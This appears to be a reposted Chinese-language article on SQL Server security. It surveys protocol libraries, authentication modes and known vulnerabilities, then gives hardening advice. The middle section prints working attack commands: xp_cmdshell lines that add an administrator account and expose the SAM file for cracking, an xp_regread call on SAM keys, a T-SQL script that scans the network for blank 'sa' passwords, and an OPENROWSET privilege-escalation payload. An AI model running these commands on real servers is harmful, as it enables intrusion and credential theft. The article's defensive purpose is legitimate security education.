关于SQL SERVER的一些安全问题
2024-08-31 00:48:51
供稿:网友
关于sql server的一些安全问题
by xundi<安全焦点>
[email protected]
www.xfocus.org
目前关于nt服务器的入侵,有很多种方法,如对iis的漏洞进行利用,但
大家不知道注意到没有,其实通过与nt服务器相关联的sql数据库服务器
的例子也是很有比例的一种手段。大家可以参看下面的一个新闻报道:
http://www.vnunet.com/news/1110938。
herbless入侵破坏的一些站点,如legoland.co.uk站点就是通过sql服务器
的入侵而获得对系统的控制权而破坏的。所以对sql服务器的保护是必不可
少的,这里我整理了一些漏洞供大家来参考,见笑,见笑。
----------------------------------------------------------------
我们先来看看sql服务程序支持的网络协议库:
----------------------------------------------------------------
| sql server network protocol libraries |
----------------------------------------------------------------
|protocol library| 可能存在的漏洞 | 是否加密 |
----------------------------------------------------------------
|named pipes | --使用nt smb端口(tcp139,udp137, | 否 |
|(有名管道) | 138)来进行通信,这些可以被通 | |
| | 的防火墙控制,但如果内部网络可| |
| | 随意访问的话也是一个不小的缺陷| |
| | --用户名字,密码和数据没有进行加| |
| | 传输,任何人可以通过sniffer来 | |
| | 进行数据捕获。 | |
----------------------------------------------------------------
|ip sockets | --默认状态下开1433口,你可以使用| 否 |
| | 扫描器来查看这个端口。 | |
| | 可以被sniffer截获数据。 | |
----------------------------------------------------------------
|multi-protocol | --客户端需要支持nt rpcs;在不同 | 是 |
| | 种类的环境中可能引起问题。 | |
| | --默认情况下使用tcp随机端口,但| |
| | 防火墙进行端口图固定实现(参 | |
| | 看kb q164667)。 | |
| | --需要注意加密选项是否选择,默 | |
| | 是不选择此选项的。 | |
----------------------------------------------------------------
|nwlink | --存在被sniffer截获数据的危险 | 否 |
----------------------------------------------------------------
|appletalk (adsp)| --存在被sniffer截获数据的危险 | 否 |
----------------------------------------------------------------
|banyan vines | --存在被sniffer截获数据的危险 | 否 |
----------------------------------------------------------------
一般的推荐使用是:如果你能在integrated (nt) security上使用named pipes 或者
multi-protocol,那你就使用这些协议库,如果可能,尽量使用multi-protocol
和使能加密选项。如果你上面几个不能使用,那就使用ip sockets协议,并改变
其默认的端口并随时检查系统保证无任何sniffer存在。并且,考虑使用一web服
务或者com组件作为应用程序的business object layer,并在中间层和sql服务程
序中使用安全通道(secure channel)。有不少第三方的产品可以加密这方面的通信。
-----------------------------------------------------------------------
下面再讲一下sql server的各种安全模式和它们怎样进行工作?
安全模式定义了一些sql server是怎样认证要使用它们服务的用户,请看下面
sql server 6.5的安全模式和在sql server 7.0做了改变的一些描述和区别:
-------------------------------------------------------------------
|安全模式 | sql server 6.5 | sql server 7.0改变地方 |
-------------------------------------------------------------------
|standard | --登陆定义在sql server里| --单独的标准模式在sql server|
|标准模式 | 而且给定密码。 | 没有使用了。 |
| | --sql server的登录帐户与| |
| | window nt分开 | |
-------------------------------------------------------------------
|integrated |-使用安全管理器sql的帐 | --在这里成为"windows nt only"|
|综合模式 | 户。 | 模式。 |
| |-用户在连接到sql server| --只工作在nt系统下,在win9x不|
| | 不需要特定分开login和 | 支持。 |
| | 密码。 | |
| |-密码从不存储在应用程序| --可以直接结合到nt的组中便于 |
| | 中,并不以明文在网络中| 管理,(注意有一builtin组在|
| | 传输。 | 本地系统上产生). |
| |-sql server可以使用nt的| |
| | 的认证方式来认证用户并| |
| | 可以使用如帐户过期等。| |
| |-需要named pipe或multi-| |
| | protocol库。 | |
--------------------------------------------------------------------
|mixed |-提供上面的方式的一些特| --成为sql server和windows nt |
|混合性方式 | 征但有后退的东西是客户| 模式。 |
| | 端不能建立可信任连接。| --尽量使用window nt only模式 | |
--------------------------------------------------------------------
登录只不过是第一步,一旦用户登录,用户必须访问独立的数据库,要使上面
的成立,就必须在sysusers表里存在一表目给用户用的每个数据库。所以安全
请你注意在你的数据库中是否存在"guest"帐户和保证不会在你不注意的时候给
某些人访问你的数据库。
详细的大家可以参看微软的站点:
http://www.microsoft.com/technet/sql/technote/secure.asp
---------------------------------------------------------------------
关于sql server存在的一些安全问题:
存在"sa"帐户,密码就为空,而且这个密码是sql server安全模块成员,我们就
可以通过xp_cmdshell stored procedure(扩展存储过程)来进行命
令操作,如:
xp_cmdshell "net user testuser ugothacked /add"
然后在:
xp_cmdshell "net localgroup administrators testuser /add"
这样攻击者就成功的在sql server上增加了一个用户。
当然远程的话,一般需要有1433口开着,通过mysql 客户端进行连接。
当然你也可以使用:
xp_cmdshell "rdisk /s-"
的方法,这样就在/winnt/repair目录里重建了信息而不提示用户。然后
在sam备份以后,攻击者可以建立一个smb连接到共享或者建立一个连接:
xp_cmdshell "net share getsam=c:/winnt/repair"
利用共享获得这个文件,然后在使用l0phtcrack来跑吧。如果smb端口被防火墙
控制了,或者关闭了,攻击者也可以拷贝sam._文件到web目录进行匿名浏览器
下载。如果人家没有开iis,你何不用tftp呢:).
ok,通过这台被控制的sql server服务器,攻击者可以通过它来查找网络内部
其他机器来扩大战果,下面是一个sql脚本来列举网络中其他sql server存在
空帐户'sa'的示例:
-----------------------------------------------------------------------
-- create temp table to store enumerated servers
set nocount on
create table #temp (shelldump varchar(255))
insert #temp exec xp_cmdshell 'osql -l'
declare @current_server varchar(255), @conn_string varchar(255)
declare sql_cursor cursor for select * from #temp
open sql_cursor fetch next from sql_cursor into @current_server
-- loop through potential targets and check for null sa accounts
-- if target is vulnerable, version information will be displayed
while @@fetch_status = 0
begin
if @current_server <> 'servers:'
begin
select @current_server = rtrim(ltrim(@current_server))
select @conn_string = 'exec xp_cmdshell ''osql -s' + @current_server + ' -usa -p -q "select @@version"'''
print 'attempting connection to server: ' + @current_server
execute (@conn_string)
print '====================================================================='
end
fetch next from sql_cursor into @current_server
end
--clean up
close sql_cursor
deallocate sql_cursor
drop table #temp
----------------------------------------------------------------------
当然有些人也可能关闭xp_cmdshell extended stored procedure(扩展存储过程),
我们也可以使用下面的方法:
xp_regread 'hkey_local_machine', 'security/sam/domains/account', 'f'
如果mssqlserver 服务在本地系统帐户下运行,并且如果系统上没有安装syskey,上面
的调用就可以返回注册表中加密的密码或者sid。
--------------------------------------------------------------------------
另一个漏洞,是关于adhoc heterogenous queries 来进行权利的提升,请看下面微软
的描述:http://www.microsoft.com/technet/security/bulletin/fq00-014.asp
关于上面的漏洞,可以使用下面的xploit来获得权利的提升:
select * from openrowset('sqloledb','trusted_connection=yes;data source=myserver',
'set fmtonly off execute master..xp_cmdshell "dir c:/"')
这是大家比较喜欢的一种可以执行其他命令,自己想吧。
---------------------------------------------------------------------------
还有就是最近的一个漏洞:extended stored procedure parameter parsing (扩展存储
过程参数解析)的漏洞,详细信息在这个url有介绍:
http://www.microsoft.com/technet/security/bulletin/ms00-092.asp。
起主要问题是在msd中提供一个api函数srv_paraminfo(),它是用来扩展存储过程调用时
解释深入参数的,如:
exec <存储过程名> <参数1>, <参数2>, ...
如要查询“c:/winnt”的目录树,可以如下表达:
exec xp_dirtree 'c:/winnt'
但没有检查各个参数的长度,传递相当长的字符串,就存在了覆盖其他堆栈
参数的可能导致缓冲溢出。
目前已经知道的过程如下:
目前已知受影响的扩展存储过程如下:
1、xp_peekqueue (xpqueue.dll)
xp_printstatements (xprepl.dll)
给第一个参数传递超长的字符串会覆盖异常处理程序所保存的返回地址。
2、xp_proxiedmetadata (xprepl.dll)
该存储过程使用4个参数。给第二个参数传递超长的字符串会覆盖异常处
理程序所保存的返回地址。
3、xp_setsqlsecurity (xpstar.dll)
该存储过程使用4个参数。给第三个参数传递超长的字符串会使整个sql
server进程立即终止。
4、xp_displayparamstmt(xprepl.dll)
xp_enumresultset(xprepl.dll)
xp_showcolv (xprepl.dll)
xp_updatecolvbm (xprepl.dll)
给第一个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返
回地址。
这里告诉大家一个技巧性的东西,如果想要知道这些扩展存储过程调用了那写dll
文件,你可以如下操作,如:
select o.name,c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and o.name
= 'xp_peekqueue'
这样你就可以获得调用这个扩展存储过程的dll了,如果微软没有出补丁的话,你就
暂时把这个dll文件改名吧,当然有些dll文件调用几个扩展存储过程,不能盲目更改,
否则导致其他的也不能使用,你需要使用下面的操作来知道dll调用那些扩展存储过程:
select o.name,c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xpqueue.dll'
幸好微软出了补丁,你可以到下面的地方找到,不用一个一个找dll程序了,呵呵:
http://support.microsoft.com/support/sql/xp_security.asp
这个漏洞@stake发现并提供演示的测试代码,大家可在这里找到:
http://www.atstake.com/research/advisories/2000/sqladv2-poc.c
--------------------------------------------------------------------------
ok,当然sql server也有一些其他漏洞,相对轻微些,如iss发现的管理员
login id存储在注册表中,其加密的方法比较简单,很容易获得,详细情况
请看:http://xforce.iss.net/alerts/advise45.php3。大家可以到其他
地方找找。
---------------------------------------------------------------------
一些对sql server系统的安全建议:
--保证打上最新的安全补丁,如下:
windows nt 4.0 - service pack 6a
sql server 6.5 - service pack 5a
sql server 7.0 - service pack 2. (various hotfixes - check
http://www.microsoft.com/download)
sql server 2000 - hotfix s80233i.exe (intel)
当然大家要密切注意微软的安全公告。
--不要在ip sockets使用端口1433,如果你使用multi-protocol也请
修改端口。
--不要把'sa'密码嵌入到任意应用程序如vb/delphi apps里,或者一
global.asa文件里,因为"sa"是sql server 的一个默认密码,其权限
类似与windows nt系统里的管理员帐户,而且密码为空。
--改变'sa'和'probe'帐户的密码。
--保证sql server的错误记录在ntfs系统上。
--如果你不需要xp_cmdshell( use sp_dropextendedproc 'xp_cmdshell' )
就不要把xp_cmdshell extended stored proc(扩展存储过程) 留在服务
器上。在任何isql窗口中输入:
use master
sp_dropextendedproc 'xp_cmdshell'
--丢弃不需要ole自动存储过程,当然enterprise manager中的某些特征也
会不能使用,这些过程包括如下:
sp_oacreate sp_oadestroy
sp_oageterrorinfo sp_oagetproperty
sp_oamethod sp_oasetproperty
sp_oastop
--去掉不需要的注册表访问过程,如下:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
--去掉其他系统存储过程,如果你认为你觉得你还有威胁,当然
要小心drop这些过程,你可以在测试机器上测试,保证你正常的
系统能完成工作,这些过程包括:
sp_bindsession sp_cursor sp_cursorclose
sp_cursorfetch sp_cursoropen sp_cursoroption
sp_getbindtoken sp_getmbcscharlen sp_ismbcsleadbyte
sp_oacreate sp_oadestroy sp_oageterrorinfo
sp_oagetproperty sp_oamethod sp_oasetproperty
sp_oastop sp_replcmds sp_replcounters
sp_repldone sp_replflush sp_replstatus
sp_repltrans sp_sdidebug xp_availablemedia
xp_cmdshell xp_deletemail xp_dirtree
xp_dropwebtask xp_dsninfo xp_enumdsn
xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks
xp_eventlog xp_findnextmsg xp_fixeddrives
xp_getfiledetails xp_getnetname xp_grantlogin
xp_logevent xp_loginconfig xp_logininfo
xp_makewebtask xp_msver xp_perfend
xp_perfmonitor xp_perfsample xp_perfstart
xp_readerrorlog xp_readmail xp_revokelogin
xp_runwebtask xp_schedulersignal xp_sendmail
xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap
xp_sprintf xp_sqlinventory xp_sqlregister
xp_sqltrace xp_sscanf xp_startmail
xp_stopmail xp_subdirs xp_unc_to_drive
--去掉数据库中guest用户。
--关闭sql mail兼容能力,防止传递一些木马病毒等。
--设置一个任务处理来定时运行下面的程序:
findstr /c:"login failed" /mssql7/log/*.*'
再重定向到其他文件或者mail到管理员信箱。
--经常检查带有空密码的帐户:
use master
select name,
password
from syslogins
where password is null
order by name
--检查所有不需要'sa'权限的存储过程和扩展存储过程访问权限:
use master
select sysobjects.name
from sysobjects, sysprotects
where sysprotects.uid = 0
and xtype in ('x','p')
and sysobjects.id = sysprotects.id
order by name
--保证sql server的传输信息在隔离的网络段中。
本文来源于网页设计爱好者web开发社区http://www.html.org.cn收集整理,欢迎访问。